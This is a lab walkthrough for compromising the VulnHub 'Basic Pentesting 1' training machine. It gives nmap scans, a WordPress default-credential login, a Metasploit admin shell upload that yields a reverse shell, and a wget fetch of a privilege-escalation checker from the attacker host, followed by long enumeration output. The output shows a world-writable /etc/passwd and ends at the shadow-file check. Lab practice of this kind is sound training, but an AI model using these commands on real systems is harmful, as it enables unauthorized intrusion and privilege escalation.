Privilege Escalation
Download the Basic-pentesting vitualmation from the following website:
https://www.vulnhub.com/entry/basic-pentesting-1,216/
1.Scan the target server using nmap.
nmap -Pn -sS --stats-every 3m --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN /root/privesc/tcp.txt.txt 10.0.0.24
nmap -nvv -Pn- -sSV -p 21,22,80 --version-intensity 9 -A -oN /root/privesc/tcp1.txt.txt 192.168.134.147
nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN /root/privesc/udp.txt.txt 10.0.0.24
2.Browse the target server through Firefox.
3. Perform the vulneribility scan using the tool nikto or dirbuster.
4.Echo the following commands and browser the "http://10.0.0.24/secret" again.
echo "10.0.0.24 vtcsec" >> /etc/hosts
5. Try to login the wordpress(Use the default username and password - admin/admin )
6.Exploit the target server using metasploit.
Start the metasploit firstly.
msfconsole
Choose the proper module and set the options.
use exploit/unix/webapp/wp_admin_shell_upload
set username admin set password admin set targeturi /secret/ set lhost 10.0.0.109 set rhost 10.0.0.24 exploit
getuid
shell
7. Download the linuxprivchecker.py from the following the website and copy it the the folder /var/www/html on Kali Linux.
https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
Download the linuxprivchecker.py to target serve and grant the full privilages.
wget 10.0.0.109/linuxprivchecker.py chmod 777 linuxprivchecker.py ls -la
Check the target linux server's privilege by echo the following command.
python linuxprivchecker.py
The check result:
================================================================================================= LINUX PRIVILEGE ESCALATION CHECKER ================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel Linux version 4.10.0-28-generic (buildd@lgw01-12) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 [+] Hostname vtcsec [+] Operating System Ubuntu 16.04.3 LTS \n \l [*] GETTING NETWORKING INFO... [+] Interfaces ens33 Link encap:Ethernet HWaddr 00:0c:29:41:76:7f inet addr:10.0.0.24 Bcast:10.0.0.255 Mask:255.255.255.0 inet6 addr: 240e:3a1:5662:9050::1007/128 Scope:Global inet6 addr: fe80::6bc9:e854:ec85:9c1b/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:126922 errors:0 dropped:0 overruns:0 frame:0 TX packets:105713 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:76154345 (76.1 MB) TX bytes:13344469 (13.3 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:2277 errors:0 dropped:0 overruns:0 frame:0 TX packets:2277 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:163834 (163.8 KB) TX bytes:163834 (163.8 KB) [+] Netstat Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 10.0.0.24:47502 10.0.0.109:4444 ESTABLISHED 2235/sh tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 ::1:631 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 1 0 10.0.0.24:80 10.0.0.109:37597 CLOSE_WAIT - udp 0 0 0.0.0.0:36239 0.0.0.0:* - udp 0 0 0.0.0.0:56941 0.0.0.0:* - udp 0 0 127.0.1.1:53 0.0.0.0:* - udp 0 0 0.0.0.0:68 0.0.0.0:* - udp 0 0 0.0.0.0:631 0.0.0.0:* - udp 0 0 0.0.0.0:5353 0.0.0.0:* - udp6 0 0 :::35041 :::* - udp6 0 0 :::45337 :::* - udp6 0 0 fe80::6bc9:e854:ec8:546 :::* - udp6 0 0 :::5353 :::* - [+] Route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 10.0.0.1 0.0.0.0 UG 100 0 0 ens33 10.0.0.0 * 255.255.255.0 U 100 0 0 ens33 link-local * 255.255.0.0 U 1000 0 0 ens33 [*] GETTING FILESYSTEM INFO... [+] Mount results sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) udev on /dev type devtmpfs (rw,nosuid,relatime,size=2000096k,nr_inodes=500024,mode=755) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000) tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=404472k,mode=755) /dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered) securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k) tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755) cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd) pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime) cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct) cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio) cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio) cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices) cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb) cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory) cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset) cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer) cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids) cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event) systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=29,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=1959) hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime) mqueue on /dev/mqueue type mqueue (rw,relatime) debugfs on /sys/kernel/debug type debugfs (rw,relatime) fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime) tmpfs on /run/user/108 type tmpfs (rw,nosuid,nodev,relatime,size=404472k,mode=700,uid=108,gid=114) gvfsd-fuse on /run/user/108/gvfs type fuse.gvfsd-fuse (rw,nosuid,nodev,relatime,user_id=108,group_id=114) [+] fstab entries # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> <dump> <pass> # / was on /dev/sda1 during installation UUID=c2265d85-3d4a-471f-b3d3-e1ab563d8520 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation UUID=1c023225-b75c-4190-8876-f7e227f5dd4a none swap sw 0 0 [+] Scheduled cron jobs -rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab /etc/cron.d: total 32 drwxr-xr-x 2 root root 4096 Nov 16 2017 . drwxr-xr-x 133 root root 12288 Nov 16 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rw-r--r-- 1 root root 244 Dec 28 2014 anacron -rw-r--r-- 1 root root 670 Mar 1 2016 php -rw-r--r-- 1 root root 190 Nov 14 2017 popularity-contest /etc/cron.daily: total 76 drwxr-xr-x 2 root root 4096 Nov 16 2017 . drwxr-xr-x 133 root root 12288 Nov 16 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rwxr-xr-x 1 root root 311 Dec 28 2014 0anacron -rwxr-xr-x 1 root root 539 Apr 5 2016 apache2 -rwxr-xr-x 1 root root 376 Mar 31 2016 apport -rwxr-xr-x 1 root root 1474 Jun 19 2017 apt-compat -rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils -rwxr-xr-x 1 root root 384 Oct 5 2014 cracklib-runtime -rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg -rwxr-xr-x 1 root root 372 May 6 2015 logrotate -rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db -rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate -rwxr-xr-x 1 root root 249 Nov 12 2015 passwd -rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest -rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common -rwxr-xr-x 1 root root 1046 May 19 2016 upstart /etc/cron.hourly: total 20 drwxr-xr-x 2 root root 4096 Aug 1 2017 . drwxr-xr-x 133 root root 12288 Nov 16 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder /etc/cron.monthly: total 24 drwxr-xr-x 2 root root 4096 Aug 1 2017 . drwxr-xr-x 133 root root 12288 Nov 16 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rwxr-xr-x 1 root root 313 Dec 28 2014 0anacron /etc/cron.weekly: total 36 drwxr-xr-x 2 root root 4096 Nov 14 2017 . drwxr-xr-x 133 root root 12288 Nov 16 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rwxr-xr-x 1 root root 312 Dec 28 2014 0anacron -rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim -rwxr-xr-x 1 root root 771 Nov 6 2015 man-db -rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common [+] Writable cron dirs [*] ENUMERATING USER AND ENVIRONMENTAL INFO... [+] Logged in User Activity 00:35:06 up 1:37, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [+] Super Users Found: root [+] Environment OLDPWD=/var/www/html/secret/wp-content/plugins APACHE_RUN_DIR=/var/run/apache2 APACHE_PID_FILE=/var/run/apache2/apache2.pid PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin APACHE_LOCK_DIR=/var/lock/apache2 LANG=C APACHE_RUN_USER=www-data APACHE_RUN_GROUP=www-data APACHE_LOG_DIR=/var/log/apache2 PWD=/tmp [+] Root and current user history (depends on privs) [+] Sudoers (privileged) [+] All users root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin [+] Current User www-data [+] Current User ID uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS... [+] World Writeable Directories for User/Group 'Root' drwxrwxrwt 5 root root 100 Jul 29 2019 /run/lock drwxrwxrwt 10 root root 4096 Jul 29 00:33 /tmp drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.font-unix drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.XIM-unix drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.Test-unix drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.ICE-unix drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.X11-unix drwxrwxrwt 2 root root 40 Jul 29 2019 /dev/mqueue drwxrwxrwt 2 root root 140 Jul 29 2019 /dev/shm drwxrwsrwt 2 root whoopsie 4096 Aug 1 2017 /var/metrics drwxrwsrwt 2 root whoopsie 4096 Aug 1 2017 /var/crash drwx-wx-wt 2 root root 4096 Apr 5 2016 /var/lib/php/sessions drwxrwxrwt 5 root root 4096 Jul 29 2019 /var/tmp [+] World Writeable Directories for Users other than Root [+] World Writable Files -rw-rw-rw- 1 root root 2364 Nov 16 2017 /etc/passwd -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/policy/.remove -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/policy/.replace -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/policy/.load -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.remove -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.replace -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.load -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.ns_name -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.ns_level -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.ns_stacked -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.stacked -rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.access --w--w--w- 1 root root 0 Jul 29 00:35 /sys/fs/cgroup/memory/cgroup.event_control -rwxrwxrwx 1 www-data www-data 25304 Jul 29 00:25 /tmp/linuxprivchecker.py [+] Checking if root's home folder is accessible [+] SUID/SGID Files and Directories drwxrwsr-x 4 root staff 4096 Aug 1 2017 /usr/local/lib/python2.7 drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/lib/python2.7/site-packages drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/lib/python2.7/dist-packages drwxrwsr-x 3 root staff 4096 Aug 1 2017 /usr/local/lib/python3.5 drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/lib/python3.5/dist-packages drwxrwsr-x 3 root staff 4096 Aug 1 2017 /usr/local/share/emacs drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/emacs/site-lisp drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/fonts drwxrwsr-x 7 root staff 4096 Aug 1 2017 /usr/local/share/sgml drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/misc drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/declaration drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/entities drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/dtd drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/stylesheet drwxrwsr-x 6 root staff 4096 Aug 1 2017 /usr/local/share/xml drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/xml/misc drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/xml/declaration drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/xml/entities drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/xml/schema -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-sr-x 1 root root 10584 Oct 13 2017 /usr/lib/xorg/Xorg.wrap -rwxr-sr-x 1 root mail 14336 Feb 23 2016 /usr/lib/evolution/camel-lock-helper-1.2 -rwsr-xr-x 1 root root 85800 Oct 18 2017 /usr/lib/snapd/snap-confine -rwsr-xr-x 1 root root 18664 Mar 18 2017 /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox -rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter -rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp -rwxr-sr-x 1 root ssh 358624 Mar 16 2017 /usr/bin/ssh-agent -rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate -rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh -rwxr-sr-x 1 root tty 27368 Jun 14 2017 /usr/bin/wall -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo -rwxr-sr-x 1 root shadow 22768 May 16 2017 /usr/bin/expiry -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn -rwxr-sr-x 1 root shadow 62336 May 16 2017 /usr/bin/chage -rwxr-sr-x 1 root crontab 36080 Apr 5 2016 /usr/bin/crontab -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd -rwsr-xr-- 1 root dip 390888 Jan 29 2016 /usr/sbin/pppd drwxrwsr-t 2 root lpadmin 4096 Mar 25 2016 /usr/share/ppd/custom drwxr-s--- 2 root dip 4096 Aug 1 2017 /etc/chatscripts drwxr-s--- 2 root dip 4096 Aug 1 2017 /etc/ppp/peers drwxr-sr-x 3 root systemd-journal 60 Jul 29 2019 /run/log/journal drwxr-s---+ 2 root systemd-journal 60 Jul 29 2019 /run/log/journal/a478f04ad61746dbbeae5965dcb060f8 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount -rwsr-xr-x 1 root root 27608 Jun 14 2017 /bin/umount -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping -rwsr-xr-x 1 root root 40152 Jun 14 2017 /bin/mount -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g drwxrwsr-x 2 root staff 4096 Apr 12 2016 /var/local drwxr-sr-x 86 man root 4096 Jul 29 2019 /var/cache/man drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ta drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ne drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ar drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/it drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/et drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sq drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/my drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/bo drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ps drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/id drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fy drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/bs drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/mhr drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ru drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fi drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/gd drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/th drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/hr drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ca drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fr_CA drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/be drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/pa drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sl drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/pl drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/shn drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/zh_HK drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ja drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ast drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/km drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/nb drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fr.UTF-8 drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/hi drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ms drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/da drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/lv drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/si drwxr-sr-x 5 man root 4096 Jul 29 2019 /var/cache/man/oldlocal drwxr-sr-x 2 man root 4096 Nov 17 2017 /var/cache/man/oldlocal/cat1 drwxr-sr-x 2 man root 4096 Nov 17 2017 /var/cache/man/oldlocal/cat5 drwxr-sr-x 2 man root 4096 Nov 17 2017 /var/cache/man/oldlocal/cat8 drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/zh_TW drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/eu drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/bg drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fo drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/es drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/eo drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fr drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ro drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/uk drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ug drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/de drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/lt drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/en_AU drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/vi drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/hu drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/cy drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ce drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/el drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/uz drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/cs drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/oc drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sv drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/nn drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fa drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ko drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/hy drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/he drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/gl drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/pt_BR drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ca@valencia drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/en_CA drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sr drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/zh_CN drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/bn drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/se drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/pt drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fr.ISO8859-1 drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sk drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ml drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/tr drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/az drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/te drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/en_GB drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ku drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/kk drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/io drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/nl drwxrwsrwt 2 root whoopsie 4096 Aug 1 2017 /var/metrics drwxrwsr-x 2 root mail 4096 Aug 1 2017 /var/mail drwxrwsrwt 2 root whoopsie 4096 Aug 1 2017 /var/crash -rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd [+] Logs containing keyword 'password' /var/log/bootstrap.log:Shadow passwords are now on. [+] Config files containing keyword 'password' /etc/ssl/openssl.cnf:# input_password = secret /etc/ssl/openssl.cnf:# output_password = secret /etc/ssl/openssl.cnf:challengePassword = A challenge password /etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user /etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'. /etc/cracklib/cracklib.conf:# passwords should not match. The files may optionally be compressed /etc/hdparm.conf:# --security-set-pass Set security password /etc/hdparm.conf:# security_pass = password /etc/hdparm.conf:# --user-master Select password to use /etc/debconf.conf:# World-readable, and accepts everything but passwords. /etc/debconf.conf:Reject-Type: password /etc/debconf.conf:# Not world readable (the default), and accepts only passwords. /etc/debconf.conf:Name: passwords /etc/debconf.conf:Accept-Type: password /etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat /etc/debconf.conf:# databases, one to hold passwords and one for everything else. /etc/debconf.conf:Stack: config, passwords /etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really /etc/security/pwquality.conf:# Configuration for systemwide password quality limits /etc/security/pwquality.conf:# Number of characters in the new password that must not be present in the /etc/security/pwquality.conf:# old password. /etc/security/pwquality.conf:# Minimum acceptable size for the new password (plus one if /etc/security/pwquality.conf:# The maximum credit for having digits in the new password. If less than 0 /etc/security/pwquality.conf:# it is the minimum number of digits in the new password. /etc/security/pwquality.conf:# The maximum credit for having uppercase characters in the new password. /etc/security/pwquality.conf:# password. /etc/security/pwquality.conf:# The maximum credit for having lowercase characters in the new password. /etc/security/pwquality.conf:# password. /etc/security/pwquality.conf:# The maximum credit for having other characters in the new password. /etc/security/pwquality.conf:# password. /etc/security/pwquality.conf:# password (digits, uppercase, lowercase, others). /etc/security/pwquality.conf:# The maximum number of allowed consecutive same characters in the new password. /etc/security/pwquality.conf:# new password. /etc/ltrace.conf:; pwd.h /etc/mysql/mysql.conf.d/mysqld.cnf:# It has been reported that passwords should be enclosed with ticks/quotes /etc/mysql/my.cnf.fallback:# It has been reported that passwords should be enclosed with ticks/quotes [+] Shadow File (Privileged) 